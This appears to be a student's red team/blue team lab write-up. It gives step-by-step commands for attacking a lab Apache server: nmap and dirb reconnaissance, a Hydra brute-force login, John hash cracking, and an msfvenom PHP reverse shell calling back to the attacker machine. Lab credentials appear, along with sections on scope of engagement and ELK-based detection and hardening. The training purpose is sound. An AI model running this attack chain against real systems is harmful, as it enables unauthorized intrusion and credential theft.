Red Team Blue Team

• Project Write Up
• The Important of the Scope of Engagement
• Notes

Project Write Up

RedTeam vs. BlueTeam

Devices

• Kali
• Capstone
• Elk

Set Up Beats

Need to set up beats in order to log the attacks.

Steps to set up:

• Log into Capstone
  • vagrant:tnargav
• sudo su
• filebeat modules enable apache
• filebeat setup
• metricbeat modules enable apache
• metricbeat setup
• packetbeat setup
• systemctl restart filebeat
• systemdtl restart metricbeat
• systemctl restart packetbeat

Attacking Capstone

• Determine capstone ip
  • First find kali ip
    • ifconfig
    • 192.168.1.90
  • Run nmap against 192.168.1.1/24
    • nmap 192.168.1.1/24
    • Did not give enough information to determine what machine is which
    • 
    • nmap -sV 192.168.1.1/24
      • 192.168.1.100
        • Elastic Search | Ubuntu
      • 192.168.1.105
        • Apache | Ubuntu
      • 
• Open http://192.168.1.105
  • Try to find "secret" page
    • dirb http://192.168.1.105
      • Returned
        • http://192.168.1.105/server-status
          • Access Forbidden
        • http://192.168.1.105/webdav
          • Username:Password Protected
    • dirb http://192.168.1.105/company_folders
      • Returned 0
    • Scrolled through pages
      • Error file missing please refer to company_folders/secret_folder
• Run Hydra against http://192.168.1.105/company_folders_secret_folder
  • Find Wordlist
    • locate rockyou
  • cd /usr/share/wordlists
  • ls
  • gunzip rockyou.txt.gz
  • ls
    • to verify successful unzip
  • hydra help
    • To see all avaliable flags
  • Ashton manages secret folder
    • Means username is ashton
  • hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder
    • ashton:leopoldo
• Open connect to corp server
  • webdav
  • log in with ryans account
  • ryan password hash d7dad0a5cd7c8376eeb50d69b3ccd352
  • echo d7dad0a5cd7c8376eeb50d69b3ccd352 > hash.txt
  • john hash.txt
  • john -show hash.txt
    • ryan:linux4u
• Upload reverse php to webdav
  • msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=4445 -f raw > exploit.php
• Create Listener
  • msf console
    • use exploit multi/handler
    • set LHOST 192.168.1.90
    • set LPORT 4445
    • set exploit php/reverse_php
    • exploit
• Open exploit.php in web to run on remote server
• Meterpreter session
  • cd /
  • ls
  • cat flag.txt

The Important of the Scope of Engagement

Penetration testing is a critical part of securing businesses; however, without limitations, it can be very damaging to an organization. The scope of engagement provides a concrete definition of what the penetration tester is allowed to do. Without that list, the penetration tester will break into whatever machines are on the network. This is bad because if there is highly sensitive information on a particular machine or you do not own certain devices on the network, or if the availability of certain devices is critical to the business. Without defining the scope upfront can lead to problems not only for the company but also for the penetration tester. The scope of engagement protects the tester from being prosecuted for unauthorized access by establishing goals, objectives, deliverables, outlining the scope of the penetration test, and by establishing communication plans.
In project two, there were several different machines on the network. There was the capstone server, the elastic stack server, and the kali machine. The capstone server was the one that we were going to infiltrate. The elastic stack server was set up to gather the logs from the capstone server so that we could analyze the penetration test and develop alerts. The kali machine was our attacker machine, we used it to find and exploit vulnerabilities on the capstone server. The elastic stack server was out of the scope of the engagement. By attacking the elastic server we could get access to files and data that we should not have had access to. Because the elastic stack can gather all the logs to every machine on the network, we could gain access to company critical data. To identify our targets we used nmap to run a port scan on the network. This returned all the devices on the network and their open ports. While this tool did not cause any harm to machines not in the scope, it did affect the other machines. In the logs you would be able to see that the machine has had icmp requests on the most thousand common ports. You would also be able to see in the nmap report all the services running on those machines. When performing an engagement it is inevitably possible that you will affect other machines or services that people on the network are using. This is because if one of the machines relies on a service that is hosted on the target machine, that machine may become inoperable until that service is online. It is also possible that passwords uncovered on the target system are also used on other machines, or that a number is inputted wrong and the wrong machine is attacked.

Notes

Setting up Beats on Capstone

This is done for logging that attacks before attacking

• • Log into capstone - Vagrant:tnargav
    • Sudo su
    • Filebeat modules enable apace
    • Filebeat setup
    • Metricbeat modules enable apache
    • Metricbeat setup
    • Packetbeat setup
    • Systemctl restart filebeat
    • Systemctl restart metricbeat
    • Systemctl restart packetbeat

Attacking capstone from kali

• Determine capstone ip
  • Run ifconfig on kali to determine subnet
    • Kali IP | 192.168.1.90
  • Run nmap against 192.168.1.1/24
    • • Nmap 192.168.1.0/24
    • Did not give enough information. Needed to run -sV to get more information
      • Nmap -sV 192.168.1.0/24
    • 192.168.1.100
      • Elastic Search | Ubuntu
    • 192.168.1.105
      • Apache | Ubuntu
    • Open http://192.168.1.105
  • Run dirb against apache server
    • Dirb http://192.168.1.105
      • Returned
        • */server-status

Access Forbiden

• • • • • */webdav

Username:Password login

• • Run Hydra against */company_folders_secret_folder - Find wordlists - Locate rockyou - Cd /usr/share/wordlists - Ls - Gunzip rockyou.txt.gz - Ls - To verify unzip - Hydra help to see options/flags - Ashton manages secret folder - Use username ashton - Hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder - ashton:leopoldo - open connect to corp server - webdav - ryan's account - ryans hash - "d7dad0a5cd7c8376eeb50d69b3ccd352" - Echo d7dad0a5cd7c8376eeb50d69b3ccd352 > hash.txt - John hash.txt - John -show hash.txt - Ryan:linux4u
    • Upload reverse shell php
      • Msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=4445 -f raw > exploit.php
    • Create listener
      • Msfconsole
        • Use exploit/multi/handler
        • Set LHOST 192.168.1.90
        • Set LPORT 4445
        • Set exploit php/reverse_php
      • Exploit
    • Cd /
    • Ls
    • Cat flag.txt

Part 3

Identifying offensive traffic

• When did the attack occur?
  • between 12am and 2 am UTC
• What response did the victim send back?
  • Http Code 401 (Unauthorized)
    • 522,611 hits
• What is concerning from the blue team perspective?
  • There are a lot of unauthorized login attempts.

Find the requests for the hidden directory

• How many requests were made to the directory?
  • 15,583
• Which files were requested?
  • connect_to_corp_server
• What kind of alarm would you set to detect this behavior in the future?
  • Alert if more than x amount of requests in x amount of time
• Identify at least one way to harden the vulnerable machine that would mitigate this request?
  • Don't list anywhere on the website the url

Identify the brute force attack

• Can you identify the packets specifically from hydra?
  • User_agent.original : Mozilla /4.0 (Hydra)
• How many requests were made in the brute force attack?
  • 15,574
• How many requests had the attacker made before discovering the correct password in this one?
• What kind of alarm would you set to detect this behavior in the future and at what threshold?
  • Too many failed logins attempted | 5 per minute
• Identify at least one way to harden the vulnerable machine that would mitigate this attack?
  • Use more secure passwords
  • Don't list usernames on the website
  • Don't allow more than 5 failed logins per minute
  • Lock out account for 10 minutes if exceeds allowable failed logins

Find the WebDav session

• How many requests were made to this directory?
  • 27
• Which files were requested?
  • Meta.php
• What kind of alarm would you set to detect this behavior in the future?
  • Create an alarm that would trigger anytime this directory is accessed by an unauthorized machine.
• Identify at least one way to harden the vulnerable machine that would mitigate this attack?
  • Connections to this folder should not be accessible from web interface
  • Access to this folder should be restricted by machine by firewall rules.

Identify reverse shell and meterpreter traffic

• Can you identify meterpreter session?
  • Yes by destination port 4444. 4444 is meterpreter default port
• What kind of alarm would you set to detect this behavior in the future?
  • Alarm for anything on port 4444
  • Alert for php uploads
• Identify at least one way to harden the vulnerable machine that would mitigate this attack?
  • Remove the ability to upload files